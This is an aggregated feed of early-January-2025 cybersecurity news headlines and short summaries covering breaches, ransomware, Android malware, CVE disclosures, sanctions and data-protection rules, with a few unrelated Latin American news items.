    AI-supported spear phishing fools more than 50% of targets

    financial
    2025-01-07 https://www.malwarebytes.com/blog/cybercrime/2025/01/ai-supported-spear-phishing-fools-more-than-50-of-targets
    AI-supported spear phishing emails tricked 54% of users in a controlled study that compared AI and human cybercriminal success rates.

    Autosummary: The study, titled Evaluating Large Language Models’ Capability to Launch Fully Automated Spear Phishing Campaigns: Validated on Human Subjects, evaluates the capability of large language models (LLMs) to conduct personalized phishing attacks and compares their performance with human experts and AI models from last year.


    Threat actors breached Argentina’s airport security police (PSA) payroll

    latam
    2025-01-07 https://securityaffairs.com/172776/uncategorized/argentinas-airport-security-police-psa-payroll-hacked.html
    Threat actors breached Argentina’s airport security police (PSA) payroll, stealing data and deducting 2,000-5,000 pesos from salaries. Threat actors have breached Argentina’s airport security police (PSA) and compromised the personal and financial data of its officers and civilian personnel. Threat actors deducted from 2,000 to 5,000 pesos under false charges like “DD mayor” and “DD […]



    Casio says data of 8,500 people exposed in October ransomware attack

    exploits ransomware
    2025-01-07 https://www.bleepingcomputer.com/news/security/casio-says-data-of-8-500-people-exposed-in-october-ransomware-attack/
    Japanese electronics manufacturer Casio says that the October 2024 ransomware incident exposed the personal data of approximately 8,500 people. [...]

    Autosummary: The latest announcement from the company lists the following exposed data: Employees (6,456 individuals): Name, employee number, email address, affiliation, gender, date of birth, family details, address, phone number, taxpayer ID numbers, and HQ system account information.


    New Mirai botnet targets industrial routers with zero-day exploits

    exploits industry
    2025-01-07 https://www.bleepingcomputer.com/news/security/new-mirai-botnet-targets-industrial-routers-with-zero-day-exploits/
    A relatively new Mirai-based botnet has been growing in sophistication and is now leveraging zero-day exploits for security flaws in industrial routers and smart home devices. [...]

    Autosummary: Huawei routers (via CVE-2017-17215); Neterbit routers (custom exploit); LB-Link routers (via CVE-2023-26801); Four-Faith Industrial Routers (via the zero-day now tracked as CVE-2024-12856); PZT cameras (via CVE-2024-8956 and CVE-2024-8957).


    US govt launches cybersecurity safety label for smart devices

    ciber
    2025-01-07 https://www.bleepingcomputer.com/news/security/us-govt-launches-cybersecurity-safety-label-for-smart-devices/
    Today, the White House announced the launch of the U.S. Cyber Trust Mark, a new cybersecurity safety label for internet-connected consumer devices. [...]

    Autosummary: The program was unveiled in July 2023, when major electronics, appliance, and consumer product makers like Amazon, Google, Best Buy, LG Electronics U.S.A., Logitech, and Samsung Electronics announced their participation.


    Only 26% of Europe’s top companies earn a high rating for cybersecurity

    ciber
    2025-01-06 https://www.helpnetsecurity.com/2025/01/06/european-companies-cybersecurity-rating/

    With the EU’s Digital Operational Resilience Act (DORA) deadline approaching on 17th January, 2025, Europe’s top 100 companies face an urgent cybersecurity challenge, according to SecurityScorecard. A-rated companies safer from breaches The report highlights the role of SecurityScorecard’s A-to-F rating system in delivering actionable insights into cyber resilience. Companies with an A rating were found to be 13.8 times less likely to experience a breach than those with an F rating. Europe’s largest organizations are … More


    Autosummary: Scandinavian companies lead in cybersecurity, with only 20% receiving a C rating or lower, compared to the UK (24%), Germany (34%), France (40%), and Italy (41%).


    Users receive at least one advanced phishing link every week

    financial
    2025-01-06 https://www.helpnetsecurity.com/2025/01/06/phishing-cyber-threats/

    Phishing remains one of the most significant cyber threats impacting organizations worldwide, according to SlashNext. Credential phishing is rising: Credential theft attacks surged dramatically in the second half of 2024 (703%), signaling a sharp escalation in the use of sophisticated phishing kits and social engineering tactics. These attack methods frequently overlap, as many credential phishing attempts incorporate malicious links as part of their strategy. Overall, email-based threats rose by 202% in the latter half of … More


    Autosummary: AI-generated attacks becoming more sophisticated: Looking ahead to 2025, we expect this evolution to accelerate, with AI-generated attacks becoming more sophisticated and harder to detect, while attackers increasingly target messaging platforms beyond email, including business collaboration tools, SMS, and social media.


    Is healthcare cybersecurity in critical condition?

    ciber
    2025-01-06 https://www.helpnetsecurity.com/2025/01/06/healthcare-cybersecurity-2024-trends/

    This article highlights key findings and trends in healthcare cybersecurity for 2024. From the rising impact of cyberattacks on patient care to the vulnerabilities posed by medical devices and supply chains, these insights provide an overview of the current state of cybersecurity in the healthcare sector. 6 key elements for building a healthcare cybersecurity response plan With 89% of practices already using tools like two-factor authentication (2FA), the importance of integrating robust cybersecurity software cannot … More


    Autosummary: The consequences of potential failures caused by cybersecurity incidents that affect end-of-life patient devices—including infusion pumps, network modules, gateways, incubators, cardiac rhythm management systems, mobility monitors, and others—can impact patient safety.


    China-linked Salt Typhoon APT compromised more US telecoms than previously known

    Telcos
    2025-01-06 https://securityaffairs.com/172724/intelligence/china-linked-salt-typhoon-breached-multiple-us.html
    China-linked Salt Typhoon group that breached multiple US telecoms compromised more firms than previously known, WSJ says. The China-linked cyberespionage group Salt Typhoon targeted more US telecoms than previously known, as The Wall Street Journal reported. According to WSJ, which cited people familiar with the matter, the Chinese cyberspies also compromised Charter Communications and Windstream. […]

    Autosummary: (Pierluigi Paganini, January 06, 2025)


    ⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [6 Jan]

    ciber
    2025-01-06 https://thehackernews.com/2025/01/thn-weekly-recap-top-cybersecurity.html
    Every tap, click, and swipe we make online shapes our digital lives, but it also opens doors—some we never meant to unlock. Extensions we trust, assistants we rely on, and even the codes we scan are turning into tools for attackers. The line between convenience and vulnerability has never been thinner. This week, we dive into the hidden risks, surprising loopholes, and the clever tricks

    Autosummary: This week's list includes — CVE-2024-43405 (ProjectDiscovery Nuclei), CVE-2024-54152 (Angular Expressions), CVE-2024-12912, CVE-2024-13062 (ASUS router AiCloud), CVE-2024-12828 (Webmin CGI), CVE-2024-56040, CVE-2024-56041 (VibeThemes VibeBP), CVE-2024-56042, CVE-2024-56043, CVE-2024-56044, CVE-2024-56045, CVE-2024-56046 (VibeThemes WPLMS), CVE-2024-56249 (Webdeclic WPMasterToolKit), CVE-2024-56198 (path-sanitizer npm package), CVE-2024-55078 (WukongCRM), and CVE-2024-12583 (Dynamics 365 Integration plugin). "The companies are also prohibited from misrepresenting how they collect, maintain, use, delete or disclose consumers' personal information; and the extent to which the companies protect the privacy, security, availability, confidentiality, or integrity of personal information," the FTC said. The vulnerability, tracked as CVE-2024-49113 (CVSS score: 7.5), was patched by Microsoft last month, along with CVE-2024-49112 (CVSS score: 9.8), a remote code execution flaw in the same component. 📰 Around the Cyber World: Two Indian Nationals Charged in the U.S. — The U.S. Department of Justice has announced charges against two Indian nationals, Ahmed Maqbul Syed, 57, and Rupesh Chandra Chintakindi, 27, for orchestrating a tech support fraud scheme targeting elderly victims in the U.S. Both have been charged with conspiracy to commit money laundering. The largest single thefts amounted to $55.48 million and $32.51 million in August and September, respectively, accounting for 52% of the year's total large-scale (above $1 million) losses, per Scam Sniffer. 🎥 Expert Webinar: Future-Ready Trust: Manage Certificates Like Never Before — Trust is the foundation of every digital interaction, but managing it across users, devices, and systems is harder than ever.


    FireScam Android Malware Poses as Telegram Premium to Steal Data and Control Devices

    financial exploits
    2025-01-06 https://thehackernews.com/2025/01/firescam-android-malware-poses-as.html
    An Android information stealing malware named FireScam has been found masquerading as a premium version of the Telegram messaging app to steal data and maintain persistent remote control over compromised devices. "Disguised as a fake 'Telegram Premium' app, it is distributed through a GitHub.io-hosted phishing site that impersonates RuStore – a popular app store in the Russian Federation,"

    Autosummary: Once installed, the dropper acts as a delivery vehicle for the main payload, which is responsible for exfiltrating sensitive data, including notifications, messages, and other app data, to a Firebase Realtime Database endpoint.


    Cybercriminals Target Ethereum Developers with Fake Hardhat npm Packages

    ciber
    2025-01-06 https://thehackernews.com/2025/01/russian-speaking-attackers-target.html
    Cybersecurity researchers have revealed several malicious packages on the npm registry that have been found impersonating the Nomic Foundation's Hardhat tool in order to steal sensitive data from developer systems. "By exploiting trust in open source plugins, attackers have infiltrated these platforms through malicious npm packages, exfiltrating critical data such as private keys, mnemonics,

    Autosummary: The list of identified counterfeit packages is as follows: nomicsfoundations, @nomisfoundation/hardhat-configure, installedpackagepublish, @nomisfoundation/hardhat-config, @monicfoundation/hardhat-config, @nomicsfoundation/sdk-test, @nomicsfoundation/hardhat-config, @nomicsfoundation/web3-sdk, @nomicsfoundation/sdk-test1, @nomicfoundations/hardhat-config, crypto-nodes-validator, solana-validator, node-validators, hardhat-deploy-others, hardhat-gas-optimizer, solidity-comments-extractors. Of these packages, @nomicsfoundation/sdk-test has attracted 1,092 downloads.


    Vulnerable Moxa devices expose industrial networks to attacks

    industry
    2025-01-06 https://www.bleepingcomputer.com/news/security/vulnerable-moxa-devices-expose-industrial-networks-to-attacks/
    Industrial networking and communications provider Moxa is warning of a high-severity and a critical vulnerability that impact various models of its cellular routers, secure routers, and network security appliances. [...]



    Dental group lied through teeth about data breach, fined $350,000

    financial
    2025-01-06 https://www.malwarebytes.com/blog/news/2025/01/dental-group-lied-through-teeth-about-data-breach-fined-350000
    US firm Westend Dental was found in violation of several HIPAA rules after denying a data breach associated with ransomware.

    Autosummary: The Indiana Office of Inspector General (OIG) later uncovered evidence that Westend Dental had experienced a ransomware attack on or around October 20, 2020, involving state residents’ protected health information, but Westend Dental still denied there had been a data breach.


    India Proposes Digital Data Rules with Tough Penalties and Cybersecurity Requirements

    ciber
    2025-01-06 https://thehackernews.com/2025/01/india-proposes-digital-data-rules-with.html
    The Indian government has published a draft version of the Digital Personal Data Protection (DPDP) Rules for public consultation. "Data fiduciaries must provide clear and accessible information about how personal data is processed, enabling informed consent," India's Press Information Bureau (PIB) said in a statement released Sunday. "Citizens are empowered with rights to demand data erasure,

    Autosummary: Some of the other notable provisions of the DPDP Act that data fiduciaries are expected to comply with are listed below: implement mechanisms for detecting and addressing breaches and maintenance of logs; in the event of a data breach, provide detailed information about the sequence of events that led to the incident, actions taken to mitigate the threat, and the identity of the individual(s), if known, within 72 hours (or more, if permitted) to the Data Protection Board (DPB); delete personal data no longer needed after a three-year period and notify individuals 48 hours before erasing such information; clearly display on their websites/apps the contact details of a designated Data Protection Officer (DPO) who is responsible for addressing any questions regarding users' processing of personal data; obtain verifiable consent from parents or legal guardians prior to processing the personal data of children under 18 or persons with disabilities (exemptions include healthcare professionals, educational institutions, and childcare providers, but only restricted to specific activities like health services, educational activities, safety monitoring, and transportation tracking).


    CISA says recent government hack limited to US Treasury

    government
    2025-01-06 https://www.bleepingcomputer.com/news/security/cisa-says-recent-government-hack-limited-to-us-treasury/
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said today that the Treasury Department breach disclosed last week did not impact other federal agencies. [...]



    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 27

    exploits
    2025-01-05 https://securityaffairs.com/172685/malware/security-affairs-malware-newsletter-round-27.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. 7-Zip Zero-Day Exploit Dropped: A New Playground for Infostealer & Supply Chain Attacks; Quasar RAT Disguised as an npm Package for Detecting Vulnerabilities in Ethereum Smart Contracts; The Mac Malware of 2024; Ransomware Vulnerability Matrix; Inside […]



    Chilean president makes historic trip to South Pole

    latam
    2025-01-04 https://www.bbc.com/news/articles/cj0r675re2no
    Gabriel Boric is the first leader in the Americas to visit the South Pole, stressing Chile's "Antarctic mission".



    PLAYFULGHOST Delivered via Phishing and SEO Poisoning in Trojanized VPN Apps

    financial exploits
    2025-01-04 https://thehackernews.com/2025/01/playfulghost-delivered-via-phishing-and.html
    Cybersecurity researchers have flagged a new malware called PLAYFULGHOST that comes with a wide range of information-gathering features like keylogging, screen capture, audio capture, remote shell, and file transfer/execution. The backdoor, according to Google's Managed Defense team, shares functional overlaps with a known remote administration tool referred to as Gh0st RAT, which had its source

    Autosummary: It also comes with capabilities to drop more payloads, block mouse and keyboard input, clear Windows event logs, wipe clipboard data, perform file operations, delete caches and profiles associated with web browsers like Sogou, QQ, 360 Safety, Firefox, and Google Chrome, and erase profiles and local storage for messaging applications such as Skype, Telegram, and QQ.


    U.S. Sanctions Chinese Cybersecurity Firm for State-Backed Hacking Campaigns

    government ciber
    2025-01-04 https://thehackernews.com/2025/01/us-treasury-sanctions-beijing.html
    The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Friday issued sanctions against a Beijing-based cybersecurity company known as Integrity Technology Group, Incorporated for orchestrating several cyber attacks against U.S. victims. These attacks have been publicly attributed to a Chinese state-sponsored threat actor tracked as Flax Typhoon (aka Ethereal Panda or

    Autosummary: "


    Brazil ex-official returns toilet she had removed from office

    latam
    2025-01-04 https://www.bbc.com/news/articles/c0rne2d540lo
    Janaína Lima said she had paid for a bathroom renovation with her own money. "

    Autosummary: "I decided to donate the equipment I acquired with my own resources to the chamber," she said in a statement on X, following a social media backlash. "


    Researchers Uncover Nuclei Vulnerability Enabling Signature Bypass and Code Execution

    exploits
    2025-01-04 https://thehackernews.com/2025/01/researchers-uncover-nuclei.html
    A high-severity security flaw has been disclosed in ProjectDiscovery's Nuclei, a widely-used open-source vulnerability scanner that, if successfully exploited, could allow attackers to bypass signature checks and potentially execute malicious code. Tracked as CVE-2024-43405, it carries a CVSS score of 7.4 out of a maximum of 10.0. It impacts all versions of Nuclei later than 3.0.0. "The "

    Autosummary: At its core, the problem stems from the use of regular expressions (aka regex) for signature validation and the parsing conflict arising as a result of using both regex and YAML parser, thus opening the door to a scenario where an attacker can introduce a "\r" character such that it sidesteps the regex-based signature verification and gets interpreted as a line break by the YAML parser. "


    New FireScam Android malware poses as RuStore app to steal data

    financial exploits
    2025-01-04 https://www.bleepingcomputer.com/news/security/new-firescam-android-malware-poses-as-rustore-app-to-steal-data/
    A new Android malware named "FireScam" is being distributed as a premium version of the Telegram app via phishing websites on GitHub that mimic RuStore, Russia's app market for mobile devices. [...] "

    Autosummary: Next, it extracts and installs the main malware payload, ‘Telegram Premium.apk’, which requests permissions to monitor notifications, clipboard data, SMS, and telephony services, among others. "


    US Treasury Department sanctioned Chinese cybersecurity firm linked to Flax Typhoon APT

    ciber
    2025-01-04 https://securityaffairs.com/172665/intelligence/us-sanctioned-chinese-cybersecurity-firm-linked-flax-typhoon.html
    The U.S. Treasury Department sanctioned Chinese cybersecurity firm Integrity Tech for its involvement in attacks attributed to the Flax Typhoon group. The U.S. Treasury sanctioned a Chinese cybersecurity firm, Integrity Tech, for links to cyberattacks by China’s state-backed Flax Typhoon APT group (also called Ethereal Panda or RedJuliett). The China-linked APT group used Integrity Tech’s infrastructure to […] "

    Autosummary: Since May 2020, over 200,000 devices, including SOHO routers, NVR/DVR devices, NAS servers, and IP cameras, have been compromised and added to the Raptor Train botnet, making it one of the largest China-linked IoT botnets discovered. "


    New FireScam Android data-theft malware poses as Telegram Premium app

    financial exploits
    2025-01-04 https://www.bleepingcomputer.com/news/security/new-firescam-android-data-theft-malware-poses-as-telegram-premium-app/
    A new Android malware named "FireScam" is being distributed as a premium version of the Telegram app via phishing websites on GitHub that mimic RuStore, Russia's app market for mobile devices. [...] "

    Autosummary: Next, it extracts and installs the main malware payload, ‘Telegram Premium.apk’, which requests permissions to monitor notifications, clipboard data, SMS, and telephony services, among others. "


    Every minute, 4,080 records are compromised in data breaches

    financial
    2025-01-03 https://www.helpnetsecurity.com/2025/01/03/digital-activity-2024/

    A recent Domo report shows that the world’s internet population has reached a record high of 5.52 billion people and uncovers signs that AI may be unseating digital juggernauts as it brings in new forms of engagement. “The phenomenal acceleration of generative AI over the past two years has dominated the digital conversation, and this year’s Data Never Sleeps report shows how we’ve reached a new tipping point – AI is primed to dethrone competitive … More

    The post Every minute, 4,080 records are compromised in data breaches appeared first on Help Net Security.

    "

    Autosummary: “In the year ahead, we’ll be watching how this shift changes our broad range of digital activity, impacts the competitive landscape, and accelerates corporate investment in AI-ready data and tech,” according to James. "


    LDAPNightmare PoC Exploit Crashes LSASS and Reboots Windows Domain Controllers

    exploits
    2025-01-03 https://thehackernews.com/2025/01/ldapnightmare-poc-exploit-crashes-lsass.html
    A proof-of-concept (PoC) exploit has been released for a now-patched security flaw impacting Windows Lightweight Directory Access Protocol (LDAP) that could trigger a denial-of-service (DoS) condition. The out-of-bounds reads vulnerability is tracked as CVE-2024-49113 (CVSS score: 7.5). It was addressed by Microsoft as part of Patch Tuesday updates for December 2024, alongside CVE-2024-49112 ( "

    Autosummary: "


    LDAPNightmare, a PoC exploit targets Windows LDAP flaw CVE-2024-49113

    exploits
    2025-01-03 https://securityaffairs.com/172618/security/ldapnightmare-exploit-cve-2024-49113.html
    Experts warn of a new PoC exploit, LDAPNightmare, that targets a Windows LDAP flaw (CVE-2024-49113), causing crashes & reboots. The vulnerability CVE-2024-49113 (CVSS score of 7.5), named LDAPNightmare, is a Windows Lightweight Directory Access Protocol (LDAP) Denial of Service flaw that was discovered by the researcher Yuki Chen. An attacker can exploit the now-patched vulnerability to […] "

    Autosummary: Below is the attack sequence devised by the researchers. In summary, the attacker sends a CLDAP referral response packet with a specific value, causing LSASS to crash and forcing a reboot of the victim server: (1) the attacker sends a DCE/RPC request to the victim server machine; (2) the victim is triggered to send a DNS SRV query about SafeBreachLabs.pro; (3) the attacker's DNS server responds with the attacker's machine hostname and LDAP port; (4) the victim sends a broadcast NBNS request to find the IP address of the received (attacker's) hostname; (5) the attacker sends an NBNS response with its IP address; (6) the victim becomes an LDAP client and sends a CLDAP request to the attacker's machine. The researchers speculate that the same attack could allow a remote attacker to execute arbitrary code on vulnerable servers by modifying the CLDAP packet. "


    French govt contractor Atos denies Space Bears ransomware attack claims

    exploits ransomware
    2025-01-03 https://www.bleepingcomputer.com/news/security/french-govt-contractor-atos-denies-space-bears-ransomware-attack-claims/
    French tech giant Atos, which secures communications for the country's military and secret services, has denied claims made by the Space Bears ransomware gang that they compromised one of its databases. [...] "

    Autosummary: "


    Richmond University Medical Center data breach impacted 674,033 individuals

    financial
    2025-01-03 https://securityaffairs.com/172641/data-breach/richmond-university-medical-center-data-breach.html
    Richmond University Medical Center has confirmed that a ransomware attack in May 2023 affected 670,000 individuals. New York’s Richmond University Medical Center confirmed a May 2023 ransomware attack impacted 674,033 individuals. Richmond University Medical Center (RUMC) is a healthcare institution based in Staten Island, New York. It provides a wide range of medical services, including […] "

    Autosummary: RUMC disclosed a data breach that potentially involved sensitive files containing personal and health information, including names, Social Security numbers, dates of birth, driver’s license numbers or state identification numbers, other government identification numbers, financial account information, credit or debit card information, biometric information, user credentials, medical treatment/diagnosis information, and/or health insurance policy information. "


    FireScam Android info-stealing malware supports spyware capabilities

    financial exploits
    2025-01-03 https://securityaffairs.com/172656/malware/firescam-android-malware.html
    FireScam malware steals credentials and financial data by monitoring Android app notifications and sending data to a Firebase database. Cybersecurity firm Cyfirma warns of the FireScam Android info-stealing malware that supports spyware capabilities. The malicious code steals credentials and financial data by monitoring app notifications and sending the information to a Firebase database. The malware […] "

    Autosummary: “The exfiltrated data is temporarily stored in the Firebase Realtime Database at the URL “https[:]//androidscamru-default-rtdb[.]firebaseio[.]com” and is later removed after potentially filtering and storing the important content in another private storage location” The dropper requests extensive permissions, such as app management, storage access, and updating or deleting apps without user consent. "


    When risky cybersecurity behavior becomes a habit among employees

    ciber
    2025-01-02 https://www.helpnetsecurity.com/2025/01/02/employees-risky-behaviors/

    While the majority of employees avoid risky behaviors, a small subset makes them a habit, posing a significant cybersecurity challenge, according to Mimecast. 48% of employees engaged in behaviors that exposed their organizations to cyber risk, with browsing violations being the most common (36% of users). Browsing violations, unlike phishing and malware events, do not directly impact security. However, they can increase the likelihood of encountering malware or online scams. Impersonation phishing widespread across sectors … More

    The post When risky cybersecurity behavior becomes a habit among employees appeared first on Help Net Security.

    "

    Autosummary: Executives, sales, and board members, being public-facing roles, also receive a high volume of phishing emails. "


    The real cost of data breaches for businesses

    financial
    2025-01-02 https://www.helpnetsecurity.com/2025/01/02/data-breaches-2024-reports/

    This article presents key findings from 2024 reports on data breaches. Breaches are taking longer to resolve and are becoming more costly for organizations. With recovery times extending and costs increasing, businesses face growing challenges in managing the aftermath. Full recovery from breaches takes longer than expected In 2024, businesses reported taking an average of 7.3 months to recover from cybersecurity breaches – 25% longer than expected and over a month past the anticipated timeline of 5.9 … More

    The post The real cost of data breaches for businesses appeared first on Help Net Security.

    "

    Autosummary: On average, enterprises already have 53 security solutions in use across their organization, however, despite large security stacks, 51% of enterprises reported a breach over the past 24 months. "


    Three Russian-German Nationals Charged with Espionage for Russian Secret Service

    rusia-ucrania
    2025-01-02 https://thehackernews.com/2025/01/three-russian-german-nationals-charged.html
    German prosecutors have charged three Russian-German nationals for acting as secret service agents for Russia. The individuals, named Dieter S., Alexander J., and Alex D., have been accused of working for a foreign secret service. Dieter S. is also alleged to have participated in sabotage operations as well as taking pictures of military installations with an aim to endanger national security. "

    Autosummary: "Dieter S. scouted out some of the targeted objects on site, taking photos and videos, for example of military transports and goods," prosecutors said, adding the intelligence information was then passed on to his contact. "


    Severe Security Flaws Patched in Microsoft Dynamics 365 and Power Apps Web API

    industry
    2025-01-02 https://thehackernews.com/2025/01/severe-security-flaws-patched-in.html
    Details have emerged about three now-patched security vulnerabilities in Dynamics 365 and Power Apps Web API that could result in data exposure. The flaws, discovered by Melbourne-based cybersecurity company Stratus Security, have been addressed as of May 2024. Two of the three shortcomings reside in Power Platform's OData Web API Filter, while the third vulnerability is rooted in the FetchXML "

    Autosummary: "


    Three Russian-German nationals charged with suspicion of secret service agent activity

    rusia-ucrania
    2025-01-02 https://securityaffairs.com/172559/intelligence/russian-german-nationals-charged-secret-service-agent-activity.html
    German authorities have charged three Russian-German nationals with suspicion of, among other things, secret service agent activity for the Russian government. German authorities have charged three Russian-German nationals on suspicion of activities including acting as secret service agents for the Russian government. On 9 December 2024, the Federal Prosecutor’s Office filed charges against the German-Russian nationals before […] "

    Autosummary: Pierluigi Paganini, January 02, 2025. German authorities have charged three Russian-German nationals with suspicion of, among other things, secret service agent activity for the Russian government. "


    Russian media outlets Telegram channels blocked in European countries

    rusia-ucrania
    2025-01-02 https://securityaffairs.com/172565/security/russian-media-outlets-telegram-channels-blocked-in-eu.html
    Telegram restricted access to Russian state-owned news channels in several European countries, including Poland, France, and Italy. Telegram blocked access to channels of multiple Russian state-owned news outlets across Europe, including Italy, Poland, Czechia, Belgium, France, the Netherlands, Greece, and Latvia. Some blocked Russian media outlets are RIA Novosti, NTV, Rossiya 1, and Rossiyskaya Gazeta.  Visitors are presented with […] "

    Autosummary: "


    New DoubleClickjacking attack exploits double-clicks to hijack accounts

    exploits
    2025-01-02 https://www.bleepingcomputer.com/news/security/new-doubleclickjacking-attack-exploits-double-clicks-to-hijack-accounts/
    A new variation of clickjacking attacks called "DoubleClickjacking" lets attackers trick users into authorizing sensitive actions using double-clicks while bypassing existing protections against these types of attacks. [...] "

    Autosummary: However, when they click on the page, they are actually clicking on links and buttons on the hidden iframe (the legitimate site), which could potentially perform malicious actions, such as authorizing an OAuth application to connect to their account or accepting an MFA request. "


    Ransomware gang leaks data stolen in Rhode Island's RIBridges Breach

    exploits
    2025-01-02 https://www.bleepingcomputer.com/news/security/ransomware-gang-leaks-data-stolen-in-rhode-islands-ribridges-breach/
    The Brain Cipher ransomware gang has begun to leak documents stolen in an attack on Rhode Island's "RIBridges" social services platform. [...] "

    Autosummary: RIBridges is an integrated eligibility system (IES) used by the state to manage and deliver social assistance programs, including healthcare, food assistance, child care, and other services. "


    Iranian and Russian Entities Sanctioned for Election Interference Using AI and Cyber Tactics

    industry rusia-ucrania
    2025-01-01 https://thehackernews.com/2025/01/iranian-and-russian-entities-sanctioned.html
    The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Tuesday leveled sanctions against two entities in Iran and Russia for their attempts to interfere with the November 2024 presidential election. The federal agency said the entities – a subordinate organization of Iran's Islamic Revolutionary Guard Corps and a Moscow-based affiliate of Russia's Main Intelligence "

    Autosummary: In August 2024, the Office of the Director of National Intelligence (ODNI), the Federal Bureau of Investigation (FBI), and the Cybersecurity and Infrastructure Security Agency (CISA) jointly accused Iran of attempting to undermine democratic processes, including by orchestrating cyber operations designed to gain access to sensitive information related to the elections. "


    New "DoubleClickjacking" Exploit Bypasses Clickjacking Protections on Major Websites

    exploits
    2025-01-01 https://thehackernews.com/2025/01/new-doubleclickjacking-exploit-bypasses.html
    Threat hunters have disclosed a new "widespread timing-based vulnerability class" that leverages a double-click sequence to facilitate clickjacking attacks and account takeovers in almost all major websites. The technique has been codenamed DoubleClickjacking by security researcher Paulos Yibelo. "Instead of relying on a single click, it takes advantage of a double-click sequence," Yibelo said. "

    Autosummary: Clickjacking, also called UI redressing, refers to an attack technique in which users are tricked into clicking on a seemingly innocuous web page element (e.g., a button), leading to the deployment of malware or exfiltration of sensitive data. "


    U.S. Treasury sanctions Russian and Iranian entities for interfering in the presidential election

    rusia-ucrania
    2025-01-01 https://securityaffairs.com/172520/laws-and-regulations/u-s-treasury-sanctioned-russia-and-iran-entities-for-disinformation.html
    The U.S. Treasury sanctioned entities for disinformation tied to Russian and Iranian intelligence before the 2024 presidential elections. The U.S. Treasury sanctioned entities for spreading disinformation linked to Russian and Iranian intelligence ahead of the 2024 presidential elections. The U.S. Treasury sanctioned Moscow’s Center for Geopolitical Expertise (CGE), founded by OFAC-designated Aleksandr Dugin, for spreading disinformation and […] "

    Autosummary: “At the direction of, and with financial support from, the GRU, CGE and its personnel used generative AI tools to quickly create disinformation that would be distributed across a massive network of websites designed to imitate legitimate news outlets to create false corroboration between the stories, as well as to obfuscate their Russian origin.” "


    The biggest cybersecurity and cyberattack stories of 2024

    ciber
    2025-01-01 https://www.bleepingcomputer.com/news/security/the-biggest-cybersecurity-and-cyberattack-stories-of-2024/
    2024 was a big year for cybersecurity, with significant cyberattacks, data breaches, new threat groups emerging, and, of course, zero-day vulnerabilities. Below are fourteen of what BleepingComputer believes are the most impactful cybersecurity stories of 2024. [...] "

    Autosummary: Data breaches linked to these attacks, which started in April 2024, have affected hundreds of millions of individuals using the services of AT&T, Ticketmaster, Santander, Pure Storage, Advance Auto Parts, Los Angeles Unified, QuoteWizard/LendingTree, and Neiman Marcus. On February 19, authorities took down LockBit's infrastructure, which included 34 servers hosting the data leak website and its mirrors, data stolen from the victims, cryptocurrency addresses, decryption keys, and the affiliate panel. CDK Global provides clients in the auto industry with a SaaS platform that handles all aspects of a car dealership's operation, including CRM, financing, payroll, support and service, inventory, and back-office operations. Information-stealing malware campaigns are running rampant this year, used in many different campaigns to steal infected users' browser information, cookies, saved credentials, credit cards, and cryptocurrency wallets. Attacks on edge networking devices run rampant: this year, we continued to see attacks targeting edge networking devices from various manufacturers, including Fortinet, TP-Link, Ivanti, and Cisco. Microsoft continued to delay its release while adding additional features, such as automatically filtering sensitive content, allowing users to exclude specific apps, websites, or in-private browsing sessions, and it can be removed if needed. "


    An X user claimed a 7-Zip zero-day vulnerability, but 7-Zip’s creator says it is a fake

    exploits
    2024-12-31 https://securityaffairs.com/172467/hacking/an-x-user-claimed-a-7-zip-zero-day-vulnerability.html
    An X user using the handle @NSA_Employee39 disclosed a zero-day vulnerability in the open-source file archive software 7-Zip. A verified X account, @NSA_Employee39, claimed to disclose a zero-day vulnerability in the open-source file archive software 7-Zip. The X user announced it would be “dropping 0days all this week,” starting with an arbitrary code execution vulnerability […] "

    Autosummary: Pierluigi Paganini, December 31, 2024. An X user using the handle @NSA_Employee39 disclosed a zero-day vulnerability in the open-source file archive software 7-Zip. "


    The state of cybersecurity and IT talent shortages

    government ciber
    2024-12-31 https://www.helpnetsecurity.com/2024/12/31/cybersecurity-skills-gap-trends-2024/

    This article highlights key findings and trends in the 2024 IT and cybersecurity skills gap, from the shortage of cybersecurity talent to the rising demand for certifications and upskilling programs, offering insights into the current state of skills development in the tech industry. Most women in IT work overtime to advance in their careers While 32% of respondents already think that men and women are treated equally in the workplace, 31% of women strongly believe … More

    The post The state of cybersecurity and IT talent shortages appeared first on Help Net Security.

    "

    Autosummary: 95% of surveyed employees said their organization has a talent development program in place, but only 25% find it to be highly effective, with a lack of time (42%), learning formats (30%), and leadership support (26%) as their main obstacles. "


    Hottest cybersecurity open-source tools of the month: December 2024

    ciber
    2024-12-31 https://www.helpnetsecurity.com/2024/12/31/hottest-cybersecurity-open-source-tools-of-the-month-december-2024/

    This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. SafeLine: Open-source web application firewall (WAF) SafeLine is an open-source and self-hosted Web Application Firewall (WAF) that protects websites from cyber attacks. Trapster Community: Open-source, low-interaction honeypot Trapster Community is an open-source, lightweight, low-interaction honeypot designed for deployment within internal networks. It enhances network security by creating a deceptive layer that monitors and detects suspicious activities. FuzzyAI: … More

    The post Hottest cybersecurity open-source tools of the month: December 2024 appeared first on Help Net Security.

    "

    Autosummary: "


    Misconfigured Kubernetes RBAC in Azure Airflow Could Expose Entire Cluster to Exploitation

    exploits
    2024-12-31 https://thehackernews.com/2024/12/misconfigured-kubernetes-rbac-in-azure.html
    Cybersecurity researchers have uncovered three security weaknesses in Microsoft's Azure Data Factory Apache Airflow integration that, if successfully exploited, could have allowed an attacker to gain the ability to conduct various covert actions, including data exfiltration and malware deployment. "Exploiting these flaws could allow attackers to gain persistent access as shadow administrators "

    Autosummary: Microsoft has since updated its documentation to emphasize the access policy risk, stating: "To prevent unauthorized access and management of your key vaults, keys, secrets, and certificates, it's essential to limit Contributor role access to key vaults under the Access Policy permission model. "


    Massive healthcare breaches prompt US cybersecurity rules overhaul

    ciber
    2024-12-31 https://www.bleepingcomputer.com/news/security/massive-healthcare-breaches-prompt-us-cybersecurity-rules-overhaul/
    The U.S. Department of Health and Human Services (HHS) has proposed updates to the Health Insurance Portability and Accountability Act of 1996 (HIPAA) to secure patients' health data following a surge in massive healthcare data leaks. [...] "

    Autosummary: "


    Chinese APT Exploits BeyondTrust API Key to Access U.S. Treasury Systems and Documents

    exploits
    2024-12-31 https://thehackernews.com/2024/12/chinese-apt-exploits-beyondtrust-api.html
